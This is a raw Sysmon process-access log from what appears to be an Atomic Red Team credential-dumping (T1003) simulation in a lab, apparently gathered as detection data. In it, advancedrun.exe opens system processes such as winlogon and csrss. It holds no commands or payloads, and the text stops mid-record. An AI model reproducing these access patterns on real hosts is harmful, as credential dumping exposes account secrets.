17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C